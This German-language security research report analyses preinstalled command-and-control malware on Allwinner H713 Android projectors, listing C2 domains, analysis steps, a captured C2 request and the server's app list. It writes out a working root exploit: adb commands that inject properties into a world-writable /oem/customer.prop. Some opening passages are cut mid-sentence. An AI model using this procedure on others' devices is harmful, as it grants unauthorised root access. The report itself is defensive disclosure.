
Zerlegung eines c2-Netzwerks chinesischer beamers - SilentSDK-Analysis
Technischer Analysebericht — Sicherheitsforschung
Betroffene Geräte: Mehrere Android-Projektoren von Beamermarken wie der Nonete (z. B. Modell HY260Pro) (wahrscheinlich auch mehrere Projektoren von Magcubic, Hotack, Huyukang und vielen weiteren, da diese Unternehmen ähnliche Modelle vertreiben und es Hinweise gibt, die dies stützen)
Chipset-Plattform: Allwinner H713 / sun50iw12p1 — betrifft möglicherweise alle Geräte auf dieser Plattform
Analysezeitraum: 11.–17. April 2026
Klassifizierung: Vorinstallierte Command-and-Control-Infrastruktur mit Remote-Access-Trojaner-Payload
api.pixelpioneerss.com) her, extrahiert sensible Geräte-IDs und kann jederzeit beliebigen zusätzlichen Schadcode mit Root-Rechten herunterladen und ausführen (chmod 777). Zudem weisen die Geräte offene Root-Backdoors auf.*.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) müssen auf Netzwerkebene blockiert werden. Betroffene Benutzer können die bösartigen Apps nur manuell über ADB deaktivieren, da sie tief im System verankert sind.Die in diesem Bericht dokumentierte Malware-Infrastruktur ist auf Android-Projektoren vorinstalliert, die derzeit in großen Mengen an Endverbraucher auf Amazon, eBay und AliExpress verkauft werden. Die betroffenen Geräte umfassen möglicherweise mehrere Markennamen (Hotack, Huyukang, Magcubic, Nonete, u. a.). Identische C2-Infrastruktur wurde unabhängig auf anderen Geräten desselben Herstellers bestätigt (siehe Abschnitt 13). Das Muster entspricht den BADBOX-Fällen.
Gekauftes Gerät: Amazon-Link – Nonete Mini Beamer 4K 1080P
| Eigenschaft | Wert |
|---|---|
| Markenname | Nonete HY260Pro (von mehreren Unternehmen verkauftes Modell) |
| Interner Modellname | NT10 |
| SoC | Allwinner sun50iw12p1 (ARM 32-bit) |
| Betriebssystem | SpectraOS (Android 11, Kernel 5.4.99) |
| Tatsächlicher Build-Fingerprint | Allwinner/h713_tuna_p3/h713-tuna_p3:11 |
| Gefälschter Build-Fingerprint | ADT-3/adt3/adt3:11/RP1A.201005.006 |
| SELinux | Permissive (keine Durchsetzung) |
| Plattform-Signing-Key | Öffentlicher AOSP-Testschlüssel |
| OEM-Zertifikat | CN=蓝鲨, OU=www.bsh.me, C=CN |
| Firmware-Kanal | HY260Pro_SpectraOS_TPYB |
Hinweis zum Umfang: Der Allwinner H713-Chipsatz ist in zahlreichen günstigen Android-Projektoren verbaut, die unter wechselnden Markennamen auf dem europäischen Markt verkauft werden. Die identische Firmware-Basis (h713_tuna_p3) und der identische C2-Betreiber (Shenzhen Aodin Technology) legen nahe, dass alle Geräte dieses OEMs dieselbe Infrastruktur enthalten.
| Schritt | Aktion | Ergebnis |
|---|---|---|
| 1 | Wireshark-Mitschnitt des Netzwerkverkehrs | HTTP-Traffic zu store-api.aodintech.com |
| 2 | Dekodierung der gzip-komprimierten C2-Antwort | 7 Apps, darunter versteckte „SilentTools" |
| 3 | AES-CBC-Entschlüsselung des Download-Pfads | Schlüssel [GESCHWÄRZT], URL zu .bpp-Datei |
| 4 | Root-Exploit über /oem/customer.prop | uid=0(root) nach Property-Injection |
| 5 | Forensischer Dump von /data, /oem, /system | APKs, Datenbanken, Konfigurationen |
| 6 | Statische Analyse von StoreOS DEX | pm install -r -d, Byte-Reversal-Schutz |
| 7 | Reverse Engineering des reverseLen-Mechanismus | Verständnis des Anti-Analyse-Schutzes |
| 8 | Brechen des Byte-Reversal-Schutzes | Entschlüsseltes, analysierbares SilentSDK DEX |
| 9 | XOR-Entschlüsselung von SilentSDK-Strings | C2-Domain api.pixelpioneerss.com bestätigt |
| 10 | Hash-Überprüfung über drei Quellen | MD5/SHA-256 stimmen exakt überein |
| 11 | Reverse Engineering des Malware-Download-Prozesses | Server sind noch online |
| 12 | Reverse Engineering der Malware | Plugin-basiertes Rat-Framework |
Root-Zugriff wurde durch eine Kombination von drei Schwachstellen erzielt:
/oem — Die Partition ist als FAT mit fmask=0000 eingehängt.customer.prop wird beim Booten geladen — Überschreibt System-Properties.```bash
adb shell getenforce # Result: Permissive
adb shell ls -la /oem/ # All files world-writableadb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
adb reboot && adb wait-for-device && adb root adb shell id
**Auswirkungen:** Jeder Benutzer mit physischem Zugriff oder ein Angreifer im selben Netzwerk (über ADB, Port 5555 offen, keine Authentifizierung) erhält vollständigen Root-Zugriff.
---
## 4. C2-Server-Antwort — Kernbeweise
### Erfasste HTTP-Anfrage```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12
Die gzip-komprimierte Antwort enthält eine JSON-Liste mit sieben Apps. Sechs davon sind reguläre Streaming-Apps (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). Die siebte ist SilentTools:
| App | Package | isShow | isForce | isSilent Install | isSilent Uninstall | launch Type |
|---|---|---|---|---|---|---|
| YouTube | com.google.android.youtube.tv | true | false | false | false | 0 |
| Disney+ | com.disney.disneyplus | true | false | false | false | 0 |
| Netflix | com.netflix.mediaclient | true | false | false | false | 0 |
| Chrome | com.android.chrome | true | false | false | false | 0 |
| Prime Video | com.amazon.amazonvideo.livingroom | true | false | false | false | 0 |
| BrowseHere | com.tcl.browser | true | false | false | false | 0 |
| SilentTools | com.hotack.silentsdk | false | true | false | true | 1 |